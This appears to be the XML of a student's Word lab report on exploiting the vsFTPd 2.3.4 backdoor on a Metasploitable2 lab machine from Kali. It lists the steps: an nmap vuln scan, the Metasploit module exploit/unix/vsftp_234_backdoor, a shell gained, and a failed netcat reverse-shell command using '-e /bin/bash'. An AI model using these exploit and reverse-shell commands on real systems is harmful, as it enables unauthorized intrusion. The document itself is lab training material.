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986F" w14:textId="1ED498B8" w:rsidR="00751EA4" w:rsidRDefault="004142B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ILO INNOCENT EZEKIEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045EA02C" w14:textId="56566D2A" w:rsidR="004142B0" w:rsidRDefault="004142B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CA6DB05" wp14:editId="41B3829C">
            <wp:extent cx="5731510" cy="3281045"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10600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3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8533" w14:textId="187F9DBA" w:rsidR="001773EF" w:rsidRDefault="001773EF" w:rsidP="001773EF">
      <w:r>
        <w:t>VULNERABLE:</w:t>
      </w:r>
      <w:r w:rsidRPr="001773EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001773EF">
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001773EF">
        <w:t xml:space="preserve"> version 2.3.4 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A80ACF" w14:textId="0EE6D272" w:rsidR="001773EF" w:rsidRDefault="00FF05A0" w:rsidP="001773EF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48241450" wp14:editId="2B2C240B">
            <wp:extent cx="3286125" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="10604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8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AF5F" w14:textId="5E420E8D" w:rsidR="00373103" w:rsidRDefault="00373103" w:rsidP="001773EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>STEPS TAKEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB06CE0" w14:textId="1210BF2F" w:rsidR="00373103" w:rsidRDefault="00373103" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The kali and metasploitable2 machines were powered on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA53027" w14:textId="64A53E63" w:rsidR="00373103" w:rsidRDefault="00373103" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nmap –script vuln was ran on the target machine which is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r w:rsidR="00337424">
        <w:t>to run my scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F873852" w14:textId="3330F263" w:rsidR="00373103" w:rsidRDefault="00373103" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> version 2.3.4 was vulnerable and can be accessed through the backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70553C23" w14:textId="189237AE" w:rsidR="00373103" w:rsidRDefault="00373103" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nv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 and port number shows its open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023CCC45" w14:textId="7B20651F" w:rsidR="00373103" w:rsidRDefault="00337424" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> takes me to the next command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>promt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which enables me to search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vsftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCFC9F6" w14:textId="3C266460" w:rsidR="00337424" w:rsidRDefault="00337424" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then I type </w:t>
      </w:r>
      <w:r w:rsidR="00EE28C3">
        <w:t>in use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EE28C3">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EE28C3">
        <w:t>/vsftp_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F9AA0" w14:textId="40474E2C" w:rsidR="00EE28C3" w:rsidRDefault="00EE28C3" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In the next command I type in show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23413391" w14:textId="06A333F3" w:rsidR="00EE28C3" w:rsidRDefault="00EE28C3" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The only option that needed to be set is the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> option. Set with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address of the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071C0626" w14:textId="590F53CF" w:rsidR="00EE28C3" w:rsidRDefault="00EE28C3" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A475E33" w14:textId="7D1CE360" w:rsidR="00EE28C3" w:rsidRDefault="00EE28C3" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A shell is given to me. Its successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E899A" w14:textId="45C87AC2" w:rsidR="00EE28C3" w:rsidRDefault="00EE28C3" w:rsidP="00373103">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A reverse shell was tried to be established using the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.56.129 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address of the</w:t>
      </w:r>
      <w:r w:rsidR="00F51D63">
        <w:t xml:space="preserve"> kali) on port 21 -e /bin/bash/ but couldn’t connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECDD690" w14:textId="77777777" w:rsidR="00EE28C3" w:rsidRPr="00373103" w:rsidRDefault="00EE28C3" w:rsidP="00F51D63">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E8B145" w14:textId="203459C1" w:rsidR="001773EF" w:rsidRDefault="007A76C1" w:rsidP="001773EF">
      <w:r w:rsidRPr="00E16692">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F7906A2" wp14:editId="42A7C86C">
            <wp:extent cx="6226810" cy="3129915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="210642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22823" name="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FAA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B2EBBE2" wp14:editId="6A4DC7DE">
            <wp:extent cx="5731510" cy="2463165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="154271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12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9C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="102DAF8B" wp14:editId="1364065A">
            <wp:extent cx="4600575" cy="314325"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="108211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5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E0D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65964070" wp14:editId="7725F0D4">
            <wp:extent cx="5731510" cy="729615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11094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75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ACE7" w14:textId="77777777" w:rsidR="00E16692" w:rsidRPr="001773EF" w:rsidRDefault="00E16692" w:rsidP="001773EF"/>
    <w:sectPr w:rsidR="00E16692" w:rsidRPr="00177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81DE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA84DB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10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B0"/>
    <w:rsid w:val="001773EF"/>
    <w:rsid w:val="001D4FAA"/>
    <w:rsid w:val="0028611A"/>
    <w:rsid w:val="002B6D69"/>
    <w:rsid w:val="00337424"/>
    <w:rsid w:val="00352808"/>
    <w:rsid w:val="00373103"/>
    <w:rsid w:val="004142B0"/>
    <w:rsid w:val="0045306F"/>
    <w:rsid w:val="004D5174"/>
    <w:rsid w:val="00582E0D"/>
    <w:rsid w:val="006739C1"/>
    <w:rsid w:val="00751EA4"/>
    <w:rsid w:val="007A76C1"/>
    <w:rsid w:val="00B1287C"/>
    <w:rsid w:val="00CB6136"/>
    <w:rsid w:val="00D73E95"/>
    <w:rsid w:val="00D84398"/>
    <w:rsid w:val="00E16692"/>
    <w:rsid w:val="00EE28C3"/>
    <w:rsid w:val="00EE602A"/>
    <w:rsid w:val="00F05EEB"/>
    <w:rsid w:val="00F51D63"/>
    <w:rsid w:val="00FF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BB84"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4D21545-A9C9-4064-943E-78FE1E84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ezekiel37</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>HP</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-25T15:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-25T15:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>